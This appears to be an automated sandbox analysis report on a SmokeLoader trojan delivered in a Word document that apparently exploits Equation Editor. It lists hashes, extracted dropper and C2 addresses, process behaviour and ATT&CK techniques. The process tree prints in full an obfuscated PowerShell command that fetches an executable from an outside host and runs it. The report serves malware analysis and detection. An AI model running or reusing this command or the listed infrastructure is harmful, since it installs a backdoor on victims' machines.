smokeloader | 06b686985f4246819d7fed52a2b9fc1dbed7406d80f902d655866aed61392cbd

General

Target

2021lk049459.doc
Size

2.2MB
MD5

40f9df41effa8762858974452db083d9
SHA1

fd382c2ae4ad3545b5d198d8c51735045584f8ce
SHA256

06b686985f4246819d7fed52a2b9fc1dbed7406d80f902d655866aed61392cbd
SHA512

f09b0b5415ac3f1c9af5f13774bb01675540a3238ac23301b404f13fb847f62725e7ad03f7de7b0fbecf19c90ee2be53b5e7b09aada12780f7685258b54f58f2

Score

10^/10

smokeloader backdoor trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://u.teknik.io/bHrgG.jpg

Extracted

Family

smokeloader

Version

2018

C2

http://94.140.114.59/1/

rc4.i32

Signatures

SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader
Blocklisted process makes network request 4 IoCs

Processes:

EQNEDT32.EXEpowershell.exe

flow pid process

6 1804 EQNEDT32.EXE
8 1804 EQNEDT32.EXE
10 1804 EQNEDT32.EXE
11 1148 powershell.exe
Executes dropped EXE 2 IoCs

Processes:

69577.exenTvWNOa.exe

pid process

1460 69577.exe
1528 nTvWNOa.exe
Loads dropped DLL 3 IoCs

Processes:

EQNEDT32.EXEpowershell.exe

pid process

1804 EQNEDT32.EXE
1148 powershell.exe
1148 powershell.exe

flow	pid	process
6	1804	EQNEDT32.EXE
8	1804	EQNEDT32.EXE
10	1804	EQNEDT32.EXE
11	1148	powershell.exe

pid	process
1804	EQNEDT32.EXE
1148	powershell.exe
1148	powershell.exe

Maps connected drives based on registry 3 TTPs 2 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

nTvWNOa.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum	nTvWNOa.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum\0	nTvWNOa.exe

Drops file in System32 directory 2 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Drops file in Windows directory 1 IoCs

Processes:

WINWORD.EXE

description ioc process

File opened for modification C:\Windows\Debug\WIA\wiatrace.log WINWORD.EXE
Office loads VBA resources, possible macro or embedded object present
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

1804 EQNEDT32.EXE

description	ioc	process
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	WINWORD.EXE

pid	process
1804	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 9 IoCs

adware spyware

Modify Registry

T1112

Processes:

WINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\Toolbar	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-2513283230-931923277-594887482-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

WINWORD.EXE

pid process

452 WINWORD.EXE
Suspicious behavior: EnumeratesProcesses 4 IoCs

Processes:

powershell.exepowershell.exe

pid process

740 powershell.exe
740 powershell.exe
1148 powershell.exe
1148 powershell.exe
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

nTvWNOa.exe

pid process

1528 nTvWNOa.exe
1528 nTvWNOa.exe
Suspicious use of AdjustPrivilegeToken 2 IoCs

Processes:

powershell.exepowershell.exe

description pid process

Token: SeDebugPrivilege 740 powershell.exe
Token: SeDebugPrivilege 1148 powershell.exe

pid	process
452	WINWORD.EXE

pid	process
740	powershell.exe
740	powershell.exe
1148	powershell.exe
1148	powershell.exe

pid	process
1528	nTvWNOa.exe
1528	nTvWNOa.exe

description	pid	process
Token: SeDebugPrivilege	740	powershell.exe
Token: SeDebugPrivilege	1148	powershell.exe

Suspicious use of FindShellTrayWindow 11 IoCs

Processes:

69577.exe

pid	process
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe

Suspicious use of SendNotifyMessage 11 IoCs

Processes:

69577.exe

pid	process
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe
1460	69577.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

WINWORD.EXE

pid process

452 WINWORD.EXE
452 WINWORD.EXE

pid	process
452	WINWORD.EXE
452	WINWORD.EXE

Suspicious use of WriteProcessMemory 20 IoCs

Processes:

WINWORD.EXEEQNEDT32.EXE69577.exepowershell.exepowershell.exe

description	pid	process	target process
PID 452 wrote to memory of 1280	452	WINWORD.EXE	splwow64.exe
PID 452 wrote to memory of 1280	452	WINWORD.EXE	splwow64.exe
PID 452 wrote to memory of 1280	452	WINWORD.EXE	splwow64.exe
PID 452 wrote to memory of 1280	452	WINWORD.EXE	splwow64.exe
PID 1804 wrote to memory of 1460	1804	EQNEDT32.EXE	69577.exe
PID 1804 wrote to memory of 1460	1804	EQNEDT32.EXE	69577.exe
PID 1804 wrote to memory of 1460	1804	EQNEDT32.EXE	69577.exe
PID 1804 wrote to memory of 1460	1804	EQNEDT32.EXE	69577.exe
PID 1460 wrote to memory of 740	1460	69577.exe	powershell.exe
PID 1460 wrote to memory of 740	1460	69577.exe	powershell.exe
PID 1460 wrote to memory of 740	1460	69577.exe	powershell.exe
PID 1460 wrote to memory of 740	1460	69577.exe	powershell.exe
PID 740 wrote to memory of 1148	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 1148	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 1148	740	powershell.exe	powershell.exe
PID 740 wrote to memory of 1148	740	powershell.exe	powershell.exe
PID 1148 wrote to memory of 1528	1148	powershell.exe	nTvWNOa.exe
PID 1148 wrote to memory of 1528	1148	powershell.exe	nTvWNOa.exe
PID 1148 wrote to memory of 1528	1148	powershell.exe	nTvWNOa.exe
PID 1148 wrote to memory of 1528	1148	powershell.exe	nTvWNOa.exe

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\2021lk049459.doc"
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:452

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:1280

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:1804

C:\Users\Public\69577.exe
"C:\Users\Public\69577.exe"
2⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe PowERsHEL`l -ExecutionPolicy Bypass -w 1 /`e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:740

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -w 1 /e IAAoAE4ARQB3AC0AbwBiAGoARQBjAHQAIAAcIGAATgBgAGUAYABUAGAALgBgAFcAYABlAGAAQgBgAEMAYABsAGAAaQBgAGUAYABOAGAAVAAdICkALgBEAG8AdwBuAEwAbwBBAGQAZgBJAGwARQAoACAAHSBoAHQAdABwAHMAOgAvAC8AdQAuAHQAZQBrAG4AaQBrAC4AaQBvAC8AYgBIAHIAZwBHAC4AagBwAGcAHSAgACwAIAAdICQARQBOAHYAOgB0AGUAbQBwAFwAbgBUAHYAVwBOAE8AYQAuAGUAeABlAB0gIAApACAAOwAgAHMAdABBAFIAdAAgAB0gJABFAE4AdgA6AHQAZQBtAHAAXABuAFQAdgBXAE4ATwBhAC4AZQB4AGUAHSA=
4⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1148

C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
"C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe"
5⤵
- Executes dropped EXE
- Maps connected drives based on registry
- Suspicious behavior: MapViewOfSection
PID:1528

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Exploitation for Client Execution

1

T1203

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

Peripheral Device Discovery

1

T1120

System Information Discovery

1

T1082

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
MD5
b4315c84bf5773b6dd43a1261b9b04be

SHA1
37f8e667b99a402337f3dd42c6aa3e1d760e8c00

SHA256
1838e21fdbcee13750e7b73a738dad458ab7698505097b71002dac30b7a1cc10

SHA512
f2005209dafbca8c71ac04b4c48a3fd8d5360b81b617e5e47c762093af885e68e29d262a4d86a0eb8ab3d5400dfb3011897d4059ab1084248479e2bf4662dd1f

Download Submit
C:\Users\Public\69577.exe
MD5
2c2cb2aa0782874d3c14cdd6f063f979

SHA1
583c43ca939f9d8a4eea53a7d71157ac3571a350

SHA256
c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da

SHA512
34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26

Download Submit
C:\Users\Public\69577.exe
MD5
2c2cb2aa0782874d3c14cdd6f063f979

SHA1
583c43ca939f9d8a4eea53a7d71157ac3571a350

SHA256
c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da

SHA512
34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26

Download Submit
\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
\Users\Admin\AppData\Local\Temp\nTvWNOa.exe
MD5
3cf58ec9de521b32015552ca3024d1cd

SHA1
539236ecd9d859f82f89311bfd564906aa98451e

SHA256
ae3e0639c29e82ba61932616457bae4100c939c281643dacfaa1bd5ba2dc9ace

SHA512
25d7bdc0c80b886bfdbf2d00fac9628899656bf56d6213e0ef75c2bd4f88117f34c7edd6f46caba291f7d64655ff486cb5bbf0fd6f8ea0996525b02b42f78599

Download Submit
\Users\Public\69577.exe
MD5
2c2cb2aa0782874d3c14cdd6f063f979

SHA1
583c43ca939f9d8a4eea53a7d71157ac3571a350

SHA256
c508cefc2d6430d8be028c7224aac6641e0da4f072e503261b32b950e0ef21da

SHA512
34c35989b80841ce09672856ad8c52475a2fa96da1004a61d2417241a25c12e108439f1c7e4851f125ea6af412e96487da793213f63feebb5ffed8f3a97c9d26

Download Submit
memory/452-60-0x0000000072881000-0x0000000072884000-memory.dmp

Filesize
12KB

Download
memory/452-61-0x0000000070301000-0x0000000070303000-memory.dmp

Filesize
8KB

Download
memory/452-62-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/452-113-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/740-78-0x0000000005240000-0x0000000005241000-memory.dmp

Filesize
4KB

Download
memory/740-71-0x0000000000000000-mapping.dmp

Download
memory/740-75-0x0000000000ED0000-0x0000000000ED1000-memory.dmp

Filesize
4KB

Download
memory/740-76-0x0000000000ED2000-0x0000000000ED3000-memory.dmp

Filesize
4KB

Download
memory/740-77-0x00000000025C0000-0x00000000025C1000-memory.dmp

Filesize
4KB

Download
memory/740-73-0x0000000000E40000-0x0000000000E41000-memory.dmp

Filesize
4KB

Download
memory/740-74-0x0000000004780000-0x0000000004781000-memory.dmp

Filesize
4KB

Download
memory/1148-95-0x0000000006180000-0x0000000006181000-memory.dmp

Filesize
4KB

Download
memory/1148-104-0x00000000063E0000-0x00000000063E1000-memory.dmp

Filesize
4KB

Download
memory/1148-86-0x0000000004920000-0x0000000004921000-memory.dmp

Filesize
4KB

Download
memory/1148-90-0x0000000005770000-0x0000000005771000-memory.dmp

Filesize
4KB

Download
memory/1148-79-0x0000000000000000-mapping.dmp

Download
memory/1148-96-0x000000007EF30000-0x000000007EF31000-memory.dmp

Filesize
4KB

Download
memory/1148-97-0x0000000006270000-0x0000000006271000-memory.dmp

Filesize
4KB

Download
memory/1148-87-0x0000000004922000-0x0000000004923000-memory.dmp

Filesize
4KB

Download
memory/1148-105-0x0000000006400000-0x0000000006401000-memory.dmp

Filesize
4KB

Download
memory/1280-64-0x000007FEFBEF1000-0x000007FEFBEF3000-memory.dmp

Filesize
8KB

Download
memory/1280-63-0x0000000000000000-mapping.dmp

Download
memory/1356-112-0x0000000003CB0000-0x0000000003CC5000-memory.dmp

Filesize
84KB

Download
memory/1356-111-0x0000000003B60000-0x0000000003B61000-memory.dmp

Filesize
4KB

Download
memory/1460-67-0x0000000000000000-mapping.dmp

Download
memory/1528-108-0x0000000000000000-mapping.dmp

Download
memory/1804-65-0x00000000753E1000-0x00000000753E3000-memory.dmp

Filesize
8KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Matrix ATT&CK v6

Replay Monitor

Loading Replay Monitor...

Downloads